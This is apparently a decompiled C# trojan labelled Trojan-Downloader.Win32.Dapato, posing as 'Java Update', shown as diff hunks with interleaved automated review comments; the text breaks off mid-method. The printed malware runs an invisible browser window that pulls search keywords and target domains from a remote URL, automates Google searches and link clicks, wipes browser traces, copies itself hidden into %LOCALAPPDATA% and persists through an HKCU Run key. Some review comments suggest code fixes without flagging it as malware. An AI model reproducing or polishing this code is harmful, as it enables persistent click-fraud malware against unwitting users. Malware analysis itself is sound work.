this.Name = str3;
}
}
}
}
}
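Review bot: In `ResolveAssembly`, the disk fallback loads whatever already sits at `<temp path>\<resource name>\<Name>.dll`: when `File.Exists(str4)` is true, the embedded bytes are not written and `Assembly.LoadFile(str4)` runs on the existing file without comparing it to `numArray`. The location is predictable and user-writable, so the code should load only content it has checked against the embedded bytes, as sketched below. Separately, `manifestResourceStream` is never disposed and the single `Read` call ignores its return value. For triage, this branch leaves a directory named after the resource under the temp path and makes two `MoveFileEx(..., null, 4)` calls that schedule deletion at reboot.

```csharp
// … unchanged: temp directory creation, str4 = str3 + assemblyInfo.Name + ".dll" …
bool reuse = false;
if (File.Exists(str4))
{
    // Only reuse an existing file when it is byte-identical to the embedded assembly.
    byte[] onDisk = File.ReadAllBytes(str4);
    reuse = onDisk.Length == numArray.Length;
    for (int i = 0; reuse && i < onDisk.Length; ++i)
        reuse = onDisk[i] == numArray[i];
}
if (!reuse)
{
    File.WriteAllBytes(str4, numArray);
    // … unchanged: the two MoveFileEx calls …
}
assembly = Assembly.LoadFile(str4);
```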
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Attributes.ObfuscateControlFlowAttribute
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
namespace SmartAssembly.Attributes
{
[AttributeUsage(AttributeTargets.Class | AttributeTargets.Struct | AttributeTargets.Constructor | AttributeTargets.Method)]
internal sealed class ObfuscateControlFlowAttribute : Attribute
{
}
}
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Attributes.PoweredByAttribute
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
namespace SmartAssembly.Attributes
{
public sealed class PoweredByAttribute : Attribute
{
public PoweredByAttribute(string s)
{
}
}
}
@@ -0,0 +1,71 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.MemoryManagement.MemoryManager
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace SmartAssembly.MemoryManagement
{
public sealed class MemoryManager
{
private static MemoryManager \u0001;
private long \u0001 = DateTime.Now.Ticks;
[DllImport("kernel32", EntryPoint = "SetProcessWorkingSetSize")]
private static extern int \u0001(
IntPtr process,
int minimumWorkingSetSize,
int maximumWorkingSetSize);
private void \u0001()
{
try
{
using (Process currentProcess = Process.GetCurrentProcess())
MemoryManager.\u0001(currentProcess.Handle, -1, -1);
}
catch
{
}
}
private void \u0001(object sender, EventArgs e)
{
try
{
long ticks = DateTime.Now.Ticks;
if (ticks - this.\u0001 <= 10000000L)
return;
this.\u0001 = ticks;
this.\u0001();
}
catch
{
}
}
private MemoryManager()
{
Application.Idle += new EventHandler(this.\u0001);
this.\u0001();
}
public static void AttachApp()
{
try
{
if (Environment.OSVersion.Platform != PlatformID.Win32NT)
return;
MemoryManager.\u0001 = new MemoryManager();
}
catch
{
}
}
}
}
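Review bot: The `SetProcessWorkingSetSize` import declares both size arguments as `int`, but the native parameters are `SIZE_T`, which is pointer-sized; in a 64-bit process the `-1, -1` passed from the private trim method is not guaranteed to arrive as `(SIZE_T)-1`. Declare them as `IntPtr minimumWorkingSetSize, IntPtr maximumWorkingSetSize` and call with `(IntPtr)(-1), (IntPtr)(-1)`. The native function returns `BOOL` and the result is discarded here, so a failed trim is silent. Note also that the static field, the instance field, the import and two methods all decompile to `\u0001`, so this listing does not compile as shown.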
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.ResourceResolver.ResourceResolver
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
namespace SmartAssembly.ResourceResolver
{
public sealed class ResourceResolver
{
public static void AttachApp()
{
try
{
\u0001.\u0001.\u0001();
}
catch (Exception ex)
{
}
}
}
}
@@ -0,0 +1,52 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Zip.AESCryptoIndirector
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
namespace SmartAssembly.Zip
{
public sealed class AESCryptoIndirector : IDisposable
{
private readonly Type m_AcspType;
private readonly object m_AESCryptoServiceProvider;
public AESCryptoIndirector()
{
try
{
this.m_AcspType = Assembly.Load("System.Core, Version=2.0.5.0, Culture=neutral, PublicKeyToken=7cec85d7bea7798e").GetType("System.Security.Cryptography.AesManaged");
}
catch (FileNotFoundException ex)
{
this.m_AcspType = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.RijndaelManaged");
}
this.m_AESCryptoServiceProvider = Activator.CreateInstance(this.m_AcspType);
}
public ICryptoTransform GetAESCryptoTransform(
byte[] key,
byte[] iv,
bool decrypt)
{
this.m_AcspType.GetProperty("Key").GetSetMethod().Invoke(this.m_AESCryptoServiceProvider, new object[1]
{
(object) key
});
this.m_AcspType.GetProperty("IV").GetSetMethod().Invoke(this.m_AESCryptoServiceProvider, new object[1]
{
(object) iv
});
return (ICryptoTransform) this.m_AcspType.GetMethod(decrypt ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(this.m_AESCryptoServiceProvider, new object[0]);
}
public void Clear() => this.m_AcspType.GetMethod(nameof (Clear)).Invoke(this.m_AESCryptoServiceProvider, new object[0]);
public void Dispose() => this.Clear();
}
}
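Review bot: The constructor handles only `FileNotFoundException`, and `GetType(...)` returns null rather than throwing when the type is missing, so `Activator.CreateInstance(this.m_AcspType)` can fail with an `ArgumentNullException` that says nothing about the cause. A guard such as `if (this.m_AcspType == null) throw new InvalidOperationException("No AES implementation found");` before the `CreateInstance` call would make that explicit. `GetAESCryptoTransform` passes `key` and `iv` to the property setters through reflection, so a rejected value surfaces as a `TargetInvocationException`; an XML doc comment stating what the method expects and throws is missing.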
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Zip.DESCryptoIndirector
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
using System.Reflection;
using System.Security.Cryptography;
namespace SmartAssembly.Zip
{
public sealed class DESCryptoIndirector : IDisposable
{
private readonly Type m_DcspType;
private readonly object m_DESCryptoServiceProvider;
public DESCryptoIndirector()
{
this.m_DcspType = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.DESCryptoServiceProvider");
this.m_DESCryptoServiceProvider = Activator.CreateInstance(this.m_DcspType);
}
public ICryptoTransform GetDESCryptoTransform(
byte[] key,
byte[] iv,
bool decrypt)
{
this.m_DcspType.GetProperty("Key").GetSetMethod().Invoke(this.m_DESCryptoServiceProvider, new object[1]
{
(object) key
});
this.m_DcspType.GetProperty("IV").GetSetMethod().Invoke(this.m_DESCryptoServiceProvider, new object[1]
{
(object) iv
});
return (ICryptoTransform) this.m_DcspType.GetMethod(decrypt ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(this.m_DESCryptoServiceProvider, new object[0]);
}
public void Clear() => this.m_DcspType.GetMethod(nameof (Clear)).Invoke(this.m_DESCryptoServiceProvider, new object[0]);
public void Dispose() => this.Clear();
}
}
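Review bot: `DESCryptoIndirector` late-binds `DESCryptoServiceProvider`, i.e. single DES with a 56-bit effective key, which is not adequate protection for data meant to stay confidential. Nothing in this file marks it as legacy; I would add `[Obsolete("DES is cryptographically weak; use AESCryptoIndirector")]` on the class, plus a comment saying it exists only to read data produced by older builds, if that is the reason (not visible here). Unlike the AES variant, the constructor has no fallback and no null check on `GetType(...)`, so a missing type fails inside `Activator.CreateInstance`.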
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.Zip.DoNotEncodeStringsAttribute
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
namespace SmartAssembly.Zip
{
[AttributeUsage(AttributeTargets.Assembly | AttributeTargets.Module | AttributeTargets.Class | AttributeTargets.Struct | AttributeTargets.Constructor | AttributeTargets.Method)]
public sealed class DoNotEncodeStringsAttribute : Attribute
{
}
}
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Java Update", "Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.csproj", "{41F7ABC8-AF39-4B04-A6B7-2ED364B63429}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{41F7ABC8-AF39-4B04-A6B7-2ED364B63429}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{41F7ABC8-AF39-4B04-A6B7-2ED364B63429}.Debug|Any CPU.Build.0 = Debug|Any CPU
{41F7ABC8-AF39-4B04-A6B7-2ED364B63429}.Release|Any CPU.ActiveCfg = Release|Any CPU
{41F7ABC8-AF39-4B04-A6B7-2ED364B63429}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,68 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
namespace \u0001
{
internal sealed class \u0001
{
private static Assembly \u0001 = (Assembly) null;
private static string[] \u0001 = new string[0];
internal static void \u0001()
{
try
{
AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\u0001.\u0001.\u0001);
}
catch (Exception ex)
{
}
}
private static Assembly \u0001([In] object obj0, [In] ResolveEventArgs obj1)
{
if ((object) \u0001.\u0001.\u0001 == null)
{
lock (\u0001.\u0001.\u0001)
{
\u0001.\u0001.\u0001 = Assembly.Load("{04d269eb-21f0-4313-8865-93f1c1e69e9b}, PublicKeyToken=3e56350693f7355e");
if ((object) \u0001.\u0001.\u0001 != null)
\u0001.\u0001.\u0001 = \u0001.\u0001.\u0001.GetManifestResourceNames();
}
}
string name = obj1.Name;
for (int index = 0; index < \u0001.\u0001.\u0001.Length; ++index)
{
if (\u0001.\u0001.\u0001[index] == name)
return !\u0001.\u0001.\u0001() ? (Assembly) null : \u0001.\u0001.\u0001;
}
return (Assembly) null;
}
private static bool \u0001()
{
try
{
StackFrame[] frames = new StackTrace().GetFrames();
for (int index = 2; index < frames.Length; ++index)
{
if ((object) frames[index].GetMethod().Module.Assembly == (object) Assembly.GetExecutingAssembly())
return true;
}
return false;
}
catch
{
return true;
}
}
}
}
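Review bot: The `Assembly.Load` line needs a comment, because the name it loads is not a file on disk: `{04d269eb-21f0-4313-8865-93f1c1e69e9b}` appears Base64-encoded as the first entry of the bind list in `AssemblyResolverHelper.ResolveAssembly`, which maps it to embedded resource `{56ab1832-9ffe-43ad-8f8b-23253f3aef61}` with the `z` (unzip) flag. Suggested: `// resolved by the AssemblyResolve hook from an embedded, zipped resource; its manifest resources back ResourceResolve`. Since every member decompiles to `\u0001`, it would also help to label which one is the cached `Assembly`, which is the `string[]` of resource names, and which is the stack-walk check. That check returns `true` from its bare `catch`, so it allows the lookup whenever the stack walk itself fails; the comment should state that too.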
@@ -0,0 +1,14 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
internal class \u003CModule\u003E
{
static \u003CModule\u003E()
{
SmartAssembly.AssemblyResolver.AssemblyResolver.AttachApp();
SmartAssembly.ResourceResolver.ResourceResolver.AttachApp();
}
}
@@ -0,0 +1,95 @@
// Decompiled with JetBrains decompiler
// Type: <PrivateImplementationDetails>
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System.Runtime.InteropServices;
internal sealed class \u003CPrivateImplementationDetails\u003E
{
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000b\u002D1 \u0024\u0024method0x600000b\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000b\u002D2 \u0024\u0024method0x600000b\u002D2;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000b\u002D3 \u0024\u0024method0x600000b\u002D3;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000b\u002D4 \u0024\u0024method0x600000b\u002D4;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600000f\u002D1 \u0024\u0024method0x600000f\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000015\u002D1 \u0024\u0024method0x6000015\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000015\u002D2 \u0024\u0024method0x6000015\u002D2;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000015\u002D3 \u0024\u0024method0x6000015\u002D3;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000015\u002D4 \u0024\u0024method0x6000015\u002D4;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000032\u002D1 \u0024\u0024method0x6000032\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000032\u002D2 \u0024\u0024method0x6000032\u002D2;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x6000032\u002D3 \u0024\u0024method0x6000032\u002D3;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600003b\u002D1 \u0024\u0024method0x600003b\u002D1;
internal static \u003CPrivateImplementationDetails\u003E.\u0024\u0024struct0x600003b\u002D2 \u0024\u0024method0x600003b\u002D2;
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
private struct \u0024\u0024struct0x600000b\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 8, Pack = 1)]
private struct \u0024\u0024struct0x600000b\u002D2
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0024\u0024struct0x600000b\u002D3
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0024\u0024struct0x600000b\u002D4
{
}
[StructLayout(LayoutKind.Explicit, Size = 1024, Pack = 1)]
private struct \u0024\u0024struct0x600000f\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0024\u0024struct0x6000015\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0024\u0024struct0x6000015\u002D2
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0024\u0024struct0x6000015\u002D3
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0024\u0024struct0x6000015\u002D4
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000032\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0024\u0024struct0x6000032\u002D2
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0024\u0024struct0x6000032\u002D3
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0024\u0024struct0x600003b\u002D1
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0024\u0024struct0x600003b\u002D2
{
}
}
@@ -0,0 +1,64 @@
// Decompiled with JetBrains decompiler
// Type: browser_bastan.Araclar
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using Microsoft.Win32;
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
namespace browser_bastan
{
public sealed class Araclar
{
private const string RegKey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
private const int FEATURE_DISABLE_NAVIGATION_SOUNDS = 21;
private const int SET_FEATURE_ON_PROCESS = 2;
public static string Regkeyname = "Java Update";
public static string DstName = "JavaUpdate.exe";
[DllImport("urlmon.dll")]
[return: MarshalAs(UnmanagedType.Error)]
private static extern int CoInternetSetFeatureEnabled(
int FeatureEntry,
[MarshalAs(UnmanagedType.U4)] int dwFlags,
bool fEnable);
public static void DisableClickSounds() => Araclar.CoInternetSetFeatureEnabled(21, 2, true);
public static void Copy(string src, string dst)
{
if (File.Exists(dst))
File.SetAttributes(dst, FileAttributes.Normal);
try
{
File.Copy(src, dst, true);
}
catch (Exception ex)
{
}
File.SetAttributes(dst, FileAttributes.Hidden);
}
public static void Startup(string name, string path)
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
if (registryKey == null)
return;
registryKey.SetValue(name, (object) path);
registryKey.Close();
}
public static void DstCheck()
{
string location = Assembly.GetExecutingAssembly().Location;
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
if (Path.GetDirectoryName(location) == folderPath)
return;
Araclar.Copy(location, folderPath + "\\" + Araclar.DstName);
}
}
}
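Review bot: `Araclar` has no comment saying that `DstCheck`, `Copy` and `Startup` are the sample's install and persistence path, so a reader has to piece it together across three methods and `Program.Main`. I would put above the class `// Install/persistence helpers: self-copy to %LOCALAPPDATA%\JavaUpdate.exe (Hidden attribute set) and an HKCU ...\CurrentVersion\Run value named "Java Update"`. In `Copy`, the empty `catch` swallows a failed `File.Copy`, and `File.SetAttributes(dst, FileAttributes.Hidden)` still runs afterwards, which throws if `dst` was never created. A comment such as `// copy failure is swallowed; SetAttributes below throws when dst is missing` would explain an otherwise puzzling crash when the sample is replayed in a sandbox.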
@@ -0,0 +1,380 @@
// Decompiled with JetBrains decompiler
// Type: browser_bastan.Form1
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Net;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
namespace browser_bastan
{
public sealed class Form1 : Form
{
private const int GWL_EXSTYLE = -20;
private const int WS_EX_TOOLWINDOW = 128;
private const int INTERNET_OPTION_END_BROWSER_SESSION = 42;
private IContainer components;
private WebBrowser webBrowser1;
private string ana = "http://www.nurullahuzmez.com";
private string baba = "http://[DEGISTIR]/v/v.php";
private Queue<KeyValuePair<string, string>> kelimelistesi = new Queue<KeyValuePair<string, string>>();
private string kelime;
private string domain;
private int suankisayfa = 1;
private Dictionary<string, bool> gezilenler = new Dictionary<string, bool>();
private Random rnd = new Random();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.webBrowser1 = new WebBrowser();
this.SuspendLayout();
this.webBrowser1.Dock = DockStyle.Fill;
this.webBrowser1.IsWebBrowserContextMenuEnabled = false;
this.webBrowser1.Location = new Point(0, 0);
this.webBrowser1.Name = "webBrowser1";
this.webBrowser1.ScriptErrorsSuppressed = true;
this.webBrowser1.Size = new Size(761, 488);
this.webBrowser1.TabIndex = 0;
this.webBrowser1.WebBrowserShortcutsEnabled = false;
this.webBrowser1.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(this.webBrowser1_DocumentCompleted);
this.webBrowser1.NewWindow += new CancelEventHandler(this.webBrowser1_NewWindow);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(761, 488);
this.Controls.Add((Control) this.webBrowser1);
this.Name = nameof (Form1);
this.Opacity = 0.0;
this.ShowIcon = false;
this.ShowInTaskbar = false;
this.StartPosition = FormStartPosition.CenterScreen;
this.Load += new EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
[DllImport("user32.dll")]
public static extern bool SetForegroundWindow(IntPtr hWnd);
[DllImport("user32.dll")]
public static extern int SetWindowLong(IntPtr window, int index, int value);
[DllImport("user32.dll")]
public static extern int GetWindowLong(IntPtr window, int index);
[DllImport("winmm.dll")]
public static extern int sndPlaySound(string lpszSoundName, int uFlags);
[DllImport("wininet.dll", SetLastError = true)]
private static extern bool InternetSetOption(
IntPtr hInternet,
int dwOption,
IntPtr lpBuffer,
int lpdwBufferLength);
public Form1() => this.InitializeComponent();
private void webBrowser1_NewWindow(object sender, CancelEventArgs e) => e.Cancel = true;
private void Basla()
{
this.DeleteCache();
try
{
this.suankisayfa = 1;
KeyValuePair<string, string> keyValuePair = this.kelimelistesi.Dequeue();
this.kelime = keyValuePair.Key;
this.domain = keyValuePair.Value;
while (this.webBrowser1.IsBusy)
Thread.SpinWait(10000);
this.webBrowser1.Navigate("http://www.google.com.tr");
}
catch (InvalidOperationException ex)
{
Environment.Exit(-1);
}
}
private void KelimeleriCek()
{
using (WebClient webClient = new WebClient())
{
string str1 = "";
try
{
str1 = webClient.DownloadString(this.baba);
}
catch (Exception ex)
{
Environment.Exit(-1);
}
string str2 = str1;
char[] chArray = new char[1]{ '\n' };
foreach (string str3 in str2.Split(chArray))
{
string[] strArray = str3.Trim().Split('|');
try
{
string key = strArray[1];
KeyValuePair<string, string> keyValuePair = new KeyValuePair<string, string>(strArray[0], key);
this.gezilenler.Add(key, false);
this.kelimelistesi.Enqueue(keyValuePair);
}
catch
{
}
}
}
}
private void BirineTikla()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute("name").Contains("btnG") || htmlElement.GetAttribute("name").Contains("btnK"))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void ButonTikla(string attribute, string value)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute(attribute).Contains(value))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void ButonaTekrarTikla(string attribute, string value)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("button"))
{
if (htmlElement.GetAttribute(attribute).Contains(value))
{
htmlElement.RaiseEvent("onmouseover");
htmlElement.RaiseEvent("onmousedown");
htmlElement.InvokeMember("click");
}
}
}
private void webBrowser1_DocumentCompleted(
object sender,
WebBrowserDocumentCompletedEventArgs e)
{
string str = e.Url.ToString();
if (str == "http://www.google.com.tr/")
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
this.TextBoxYaz("name", "q", this.kelime);
this.SureliIslet(new Form1.SureliFonksiyon(this.SubmitForm), 4000, 5000);
}), 2000, 4000);
else if (str.StartsWith("http://www.google.com.tr") && str.Contains("hl=tr"))
{
int suankisayfa = this.suankisayfa;
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
if (this.LinkeTikla(this.domain))
return;
this.SureliIslet(new Form1.SureliFonksiyon(this.Ilerle), 5000, 12000);
}), 3000, 6000);
}
else
{
if (!str.Contains(this.domain) || str.StartsWith("http://www.google.com"))
return;
this.SureliIslet((Form1.SureliFonksiyon) (() =>
{
if (this.gezilenler[this.domain])
return;
this.gezilenler[this.domain] = true;
this.RastGeleGez();
}), 20000, 50000);
}
}
private void SubmitForm()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("Form"))
htmlElement.InvokeMember("submit");
}
private void Ilerle()
{
++this.suankisayfa;
foreach (HtmlElement link in this.webBrowser1.Document.Links)
{
if (link.OuterText == this.suankisayfa.ToString() || link.OuterText == this.suankisayfa.ToString() + " ")
{
link.RaiseEvent("onmouseover");
link.RaiseEvent("onmousedown");
link.InvokeMember("click");
}
}
}
private void RastGeleGez()
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
HtmlElementCollection elementsByTagName = this.webBrowser1.Document.GetElementsByTagName("a");
List<HtmlElement> htmlElementList = new List<HtmlElement>(elementsByTagName.Count);
if (elementsByTagName.Count > 0)
{
foreach (HtmlElement htmlElement in elementsByTagName)
{
if (htmlElement.GetAttribute("target") != "_blank" && !string.IsNullOrEmpty(htmlElement.InnerText) && this.NormalLink(htmlElement.GetAttribute("href")))
htmlElementList.Add(htmlElement);
}
if (htmlElementList.Count > 0)
{
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmouseover");
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmousedown");
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].InvokeMember("click");
htmlElementList.Clear();
}
}
this.SureliIslet((Form1.SureliFonksiyon) (() => this.SureliIslet(new Form1.SureliFonksiyon(this.Basla), 240001, 241000)), 5000, 6000);
}
private bool NormalLink(string url) => !url.EndsWith("xml") && !url.EndsWith("@") && !url.EndsWith("SetHomePage") && !url.EndsWith("AddFavorite") && !url.EndsWith(".jpg") && !url.EndsWith(".gif") && !url.EndsWith(".png") && !url.EndsWith(".rar") && !url.EndsWith(".zip") && !url.EndsWith(".vcf") && !url.EndsWith(".exe") && !url.EndsWith(".mp3") && !url.EndsWith(".mp4") && !url.EndsWith("mailto");
private void DeleteCache()
{
Process.Start(new ProcessStartInfo()
{
FileName = "RunDll32.exe",
Arguments = "InetCpl.cpl,ClearMyTracksByProcess 1"
}).WaitForExit();
Process.Start(new ProcessStartInfo()
{
FileName = "RunDll32.exe",
Arguments = "InetCpl.cpl,ClearMyTracksByProcess 8"
}).WaitForExit();
Form1.InternetSetOption(IntPtr.Zero, 42, IntPtr.Zero, 0);
}
private void TextBoxYaz(string att, string attname, string attvalue)
{
if (!(this.webBrowser1.Document != (HtmlDocument) null))
return;
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
{
if (htmlElement.GetAttribute(att).Equals(attname))
htmlElement.SetAttribute("value", attvalue);
}
}
private bool LinkeTikla(string url)
{
bool flag = false;
List<string> stringList = new List<string>();
